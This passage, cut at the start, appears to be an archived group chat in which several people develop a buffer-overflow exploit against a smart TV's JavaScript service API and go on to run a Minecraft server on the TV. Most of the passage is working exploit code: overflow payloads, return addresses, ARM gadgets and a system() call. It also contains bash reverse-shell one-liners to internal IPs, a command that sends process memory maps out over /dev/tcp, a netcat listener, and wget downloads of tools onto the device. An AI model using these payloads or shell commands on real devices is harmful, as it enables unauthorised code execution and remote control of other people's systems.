AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA";
>     payload += encodeInt(0x41414141);
>     payload += encodeInt(0x42424242);
>     payload += encodeInt(0x9EBA0404);
>     for(let i = 0; i < 4194304; i++)
>     {
>         payload += encodeInt(0xE0A15005);
>     }
>     payload += shellcode;
>     new TV_JSP().tvServices.AmbiGet(0, payload);
> }
> ```
> @Jan4V#0289
> http://shell-storm.org/blog/Shellcode-On-ARM-Architecture/
> @Emily | Sunpy#5213
> http://shell-storm.org/shellcode/files/shellcode-730.php
> @Jan4V#0289
> btw `"a".repeat(123)` is a thing
> @HoLLy#2750
> ```js
> function executeShellcode(shellcode) {
>     var payload = "A".repeat(1036);
>     payload += encodeInt(0x41414141);
>     payload += encodeInt(0x42424242);
>     payload += encodeInt(0x9EBA0404);
>     for(let i = 0; i < 0x400000; i++)
>     {
>         payload += encodeInt(0xE0A15005);
>     }
>     payload += shellcode;
>     new TV_JSP().tvServices.AmbiGet(0, payload);
> }
>
> executeShellcode(encodeInt(0xEF91337B));
> ```
> @Jan4V#0289
> File: `crashdump` (124.31 KB)
> @Emily | Sunpy#5213
> ```js
> function encodeInt(input) {
>     return String.fromCharCode((input & 0xFF), ((input >> 8) & 0xFF), ((input >> 16) & 0xFF), ((input >> 24) & 0xFF));
> }
> function executeCommand(command) {
>     var payload = "A".repeat(1036);
>     payload += encodeInt(0x01011D48);
>     payload += encodeInt(0x42424242);
>     payload += encodeInt(0x9EBA0404);
>     for(let i = 0; i < 0x400000; i++)
>     {
>         payload += encodeInt(0xE0A15005);
>     }
>     payload += encodeInt(0xE2444401);
>     payload += encodeInt(0xE1A0B004);
>     payload += encodeInt(0xE28F4008);
>     payload += encodeInt(0xE1A0F00B);
>     payload += encodeInt(0x41414141);
>     payload += encodeInt(0x42424242);
>     payload += command;
>     new TV_JSP().tvServices.AmbiGet(0, payload);
> }
>
> executeCommand("touch /tmp/jan4v.txt");
> ```
> @Jan4V#0289
> File: `crashdump` (124.31 KB) (DUPLICATE: No crashdump was generated and I did not pay attention to the timestamp)
> @Emily | Sunpy#5213
> ``/dev/shm/shm_tmp/fusion.0.1``
> @Jan4V#0289
> File: `crashdump` (6.03 MB)
> @Emily | Sunpy#5213
> File: `crashdump` (167.34 KB)
> @Emily | Sunpy#5213
> ```js
> function encodeInt(input) {
>     return String.fromCharCode((input & 0xFF), ((input >> 8) & 0xFF), ((input >> 16) & 0xFF), ((input >> 24) & 0xFF));
> }
>
> function execute(pc, r4, r11) {
>     var payload = "A".repeat(1040);
>     payload += encodeInt(r4);
>     payload += encodeInt(r11);
>     payload += encodeInt(pc);
>     new TV_JSP().tvServices.AmbiGet(0, payload);
> }
>
> function writeMemory4(address, data)
> {
>     execute(0x23BCC, address + 0x880, data);
> }
>
> function callSystem(address)
> {
>     execute(0x11D48, address, 0x41414141);
> }
>
> writeMemory4(0x8a55f040, 0x7478742E);
> ```
> @Jan4V#0289
> I mean you could already pwn the browser
> I believe
> so you could make it display any web page
> and we can read/write a bunch of files on the fs
> but sunpy is too scared to overwrite a script and get a shell that way, so we're doing the obviously safer way of corrupting the stack and jumping to the middle of a function, in the hope we can run a shell command that way :^)
> @HoLLy#2750
> We couldn't overwrite the scripts though
> @Shaddy#4422
> when I say "we" I basically mean an
> we tried like 1 script lol
> @HoLLy#2750
> we don't have permissions to write to the file
> we only have permissions to tmp
> @Emily | Sunpy#5213
> there's multiple places that get executed
> probably more places too though
> @HoLLy#2750
> We've tried multiple places
> @Shaddy#4422
> if there's a file/folder with incorrect permissions
> @HoLLy#2750
> That's the less exciting exploit anyway :^)
> @Shaddy#4422
> I tried to look for a script that *may* be in tmp that gets executed as the people doesn't seem to be consistent
> but couldn't find any
> we have permissions to /3rd_rw as well
> @Emily | Sunpy#5213
> I'm going to jump out the window
> we can write commands to an ini file in read/write area
> @Emily | Sunpy#5213
> ``bash -i >& /dev/tcp/10.0.0.1/4242 0>&1``
> @Jan4V#0289
> @Emily | Sunpy#5213 `( sleep 300 ; echo "80" > /sys/class/leds/blue/brightness ) &`
> @HoLLy#2750
> https://blog.ropnop.com/upgrading-simple-shells-to-fully-interactive-ttys/
> http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet
> @HoLLy#2750
> `( sleep 6 ; bash -i >& /dev/tcp/192.168.2.134/4242 0>&1 ) &`
> @Emily | Sunpy#5213
> ``( sleep 30; cat /proc/*/maps > /dev/tcp/127.0.0.1/4242; ) &``
> @Jan4V#0289
> File: `crashdump` (268.85 KB)
> @Emily | Sunpy#5213
> ![Terminal-tmux](img/img0.png "img0")
> @HoLLy#2750
> ```js
> function encodeInt(input) {
>     return String.fromCharCode((input & 0xFF), ((input >> 8) & 0xFF), ((input >> 16) & 0xFF), ((input >> 24) & 0xFF));
> }
>
> function execute(pc, r4, r11) {
>     var payload = "A".repeat(1040);
>     payload += encodeInt(r4);
>     payload += encodeInt(r11);
>     payload += encodeInt(pc);
>     new TV_JSP().tvServices.AmbiGet(0, payload);
> }
>
> function callSystem(address)
> {
>     execute(0x11D48, address, 0x41414141);
> }
>
> callSystem(0x9CF55588);
> ```
> @Jan4V#0289
> ![cmd - nc -nlvp 1337](img/img1.png "img1")
> @Emily | Sunpy#5213
> ``/3rd/bin/wget https://busybox.net/downloads/binaries/1.31.0-defconfig-multiarch-musl/busybox-armv7l``
> ![openbox commands](img/img2.png "img2")
> @Jan4V#0289
> ``mount -t devpts none /dev/pts``
> @Jan4V#0289
> ![terminal](img/img3.png "img3")
> @Emily | Sunpy#5213
> https://cdn.azul.com/zulu-embedded/bin/zulu8.44.0.213-ca-jdk1.8.0_242-linux_aarch32hf.tar.gz
> @Jan4V#0289
> https://betacraft.pl/server-archive/minecraft/
> @Jan4V#0289
> https://download.cuberite.org/linux-armhf-raspbian/Cuberite.tar.gz
> @Jan4V#0289
> ``LD_LIBRARY_PATH=/lib:/3rd_rw/server``
> https://cdn.azul.com/zulu-embedded/bin/zulu8.44.0.213-ca-jdk1.8.0_242-linux_aarch32sf.tar.gz
> @Jan4V#0289
> ![minecraft server start](img/img4.png "img4")
> ![minecraft server still starting](img/img5.png "img5")
> @Emily | Sunpy#5213
> 569043771063ns loadtime :D
> @Emily | Sunpy#5213
> ![minecraft server running](img/img6.png "img6")
> @Emily | Sunpy#5213
> ```
> AllowTcpForwarding remote
> AllowStreamLocalForwarding no
> GatewayPorts yes
> ```
> @Jan4V#0289
> > minecraft code execution
> > \- Holly
> @Emily | Sunpy#5213